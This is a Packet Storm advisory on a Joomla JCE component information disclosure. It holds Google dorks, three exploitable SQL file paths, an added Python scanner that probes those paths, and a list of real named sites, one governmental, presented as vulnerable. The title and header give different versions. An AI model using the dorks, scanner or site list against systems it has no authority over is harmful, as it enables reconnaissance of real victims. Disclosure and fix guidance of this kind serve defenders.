Joomla JCE 2.6.33 Database Backup Disclosure

2018-12-01T00:00:00
ID PACKETSTORM:150548
Type packetstorm
Reporter KingSkrupellos
Modified 2018-12-01T00:00:00

Description

#################################################################################################
  
# Exploit Title : Joomla Content Editor (com_jce) Component 2.5.24 Database Backup Disclosure / Information Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/11/2018  
# Vendor Homepage : joomlacontenteditor.net  
# Software Download Links : joomlacontenteditor.net/downloads/  
+ github.com/joomla/volunteers.joomla.org/tree/master/www/administrator/components/com_jce/sql
+ gitlab.dev.playkey.net/realzkh/realzkh_legacy/tree/master/administrator/components/com_jce/sql
+ JCE 2.6.33 => joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1353&element=f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=9ee3309d5768681d0360490d647c2266
+ JCE 2.5.24 => joomlacontenteditor.net/news/jce-2524-released  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 2.6.33 ~ 2.5.24  
# Google Dorks : inurl:"/index.php?option=com_jce"
"Index of /administrator/components/com_jce/sql/"
# Exploit Risk : Medium  
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/administrator/  
  
# Exploit :  
  
/administrator/components/com_jce/sql/mysql.sql  
  
/administrator/components/com_jce/sql/postgresql.sql  
  
/administrator/components/com_jce/sql/sqlsrv.sql  
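The three files above sit in the component's `sql/` directory, which by Joomla packaging convention holds the installation schema scripts that the component manifest runs on install; they are static files shipped with JCE, not a dump of the live database. A direct hit therefore confirms that JCE is installed and reveals its table layout, and it also shows that the web server is serving the component directory without any access restriction. The checker below is an added example written for this page, not code from the original advisory or from the JCE project. It builds the three URLs from a Joomla base URL (including the sub-directory installs seen in the example list, such as `/nl/` or `/joomla30/`), fetches them, and classifies each response. The `CREATE TABLE` heuristic, the constructed sample bodies and the `jce-sql-check` user agent are assumptions made here, not anything the advisory specifies.

```python
"""Added example (not part of the original advisory): probe a Joomla site for
world-readable JCE install-schema scripts and classify the responses offline."""
import re
import sys
import urllib.request
from urllib.error import HTTPError, URLError
from urllib.parse import urljoin

# Paths listed in the advisory's "Exploit" section, relative to the Joomla root.
JCE_SQL_PATHS = (
    "administrator/components/com_jce/sql/mysql.sql",
    "administrator/components/com_jce/sql/postgresql.sql",
    "administrator/components/com_jce/sql/sqlsrv.sql",
)

# Heuristic (an assumption of this example): an install-schema script
# contains at least one CREATE TABLE statement.
_SQL_DDL = re.compile(r"\bCREATE\s+TABLE\b", re.IGNORECASE)

# Constructed sample bodies for the offline demo; not captured from any real site.
SAMPLE_SQL_BODY = (
    "-- constructed sample, not a real JCE file\n"
    "CREATE TABLE IF NOT EXISTS `#__example_profiles` (\n"
    "  `id` int(11) NOT NULL AUTO_INCREMENT,\n"
    "  PRIMARY KEY (`id`)\n"
    ");\n"
)
SAMPLE_HTML_BODY = "<!DOCTYPE html><html><body><h1>404 - Not Found</h1></body></html>"


def build_urls(base_url):
    """Return the three probe URLs for a Joomla root; the root may be a sub-directory."""
    if not base_url.endswith("/"):
        base_url += "/"          # urljoin would otherwise drop the last path segment
    return [urljoin(base_url, path) for path in JCE_SQL_PATHS]


def classify(status, body):
    """Map one HTTP response to 'disclosed', 'blocked' or 'not-found'.

    A 200 whose body is HTML is treated as a soft 404 or a login page, not as a
    disclosure; only a 200 carrying SQL DDL counts as the file being served.
    """
    if status in (401, 403):
        return "blocked"
    if status != 200:
        return "not-found"
    head = body.lstrip()[:512].lower()
    if head.startswith("<") or "<html" in head:
        return "not-found"
    if _SQL_DDL.search(body):
        return "disclosed"
    return "not-found"


def fetch(url, timeout=10):
    """GET a URL and return (status, first 64 KiB of body); network errors give status 0."""
    req = urllib.request.Request(url, headers={"User-Agent": "jce-sql-check/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(65536).decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, ""
    except URLError:
        return 0, ""


def scan(base_url):
    """Probe all three paths under a Joomla root and return {url: verdict}."""
    return {url: classify(*fetch(url)) for url in build_urls(base_url)}


def demo():
    """Offline run over the constructed samples, so the classifier can be exercised without a target."""
    return {
        "sql": classify(200, SAMPLE_SQL_BODY),
        "html": classify(200, SAMPLE_HTML_BODY),
        "forbidden": classify(403, ""),
    }


if __name__ == "__main__":
    results = scan(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for key, verdict in results.items():
        print(f"{verdict:10s} {key}")
```

Run it as `python3 jce_sql_check.py https://target.example/joomla30/` against a host you are authorised to test; with no argument it classifies the constructed samples. A `disclosed` verdict on any of the three paths is the condition this advisory describes, and the fix is on the web-server side: deny direct HTTP access to `administrator/components/com_jce/sql/` (or remove the directory after installation), since the scripts are only needed by the installer.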
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+] volunteers.joomla.org/www/administrator/components/com_jce/sql/mysql.sql  
  
[+] freightdb.kzntransport.gov.za/administrator/components/com_jce/sql/mysql.sql
  
[+] murraynebraska.com/nl/administrator/components/com_jce/sql/mysql.sql  
  
[+] rkbell.ca/joomla30/administrator/components/com_jce/sql/mysql.sql  
  
[+] vir.nw.ru/test/vir.nw/administrator/components/com_jce/sql/mysql.sql  
  
[+] weepingwaternebraska.com/nl/administrator/components/com_jce/sql/mysql.sql
  
[+] fotozrak.mk/print/administrator/components/com_jce/sql/mysql.sql  
  
[+] colegioconcepciondeparral.cl/ccparral/administrator/components/com_jce/sql/mysql.sql
  
[+] elmwoodnebraska.com/nl/administrator/components/com_jce/sql/mysql.sql  
  
[+] nowagalicja.itl.pl/files/jce/administrator/components/com_jce/sql/sqlsrv.sql
  
[+] aeroglobal.org/ios/administrator/components/com_jce/sql/mysql.sql  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  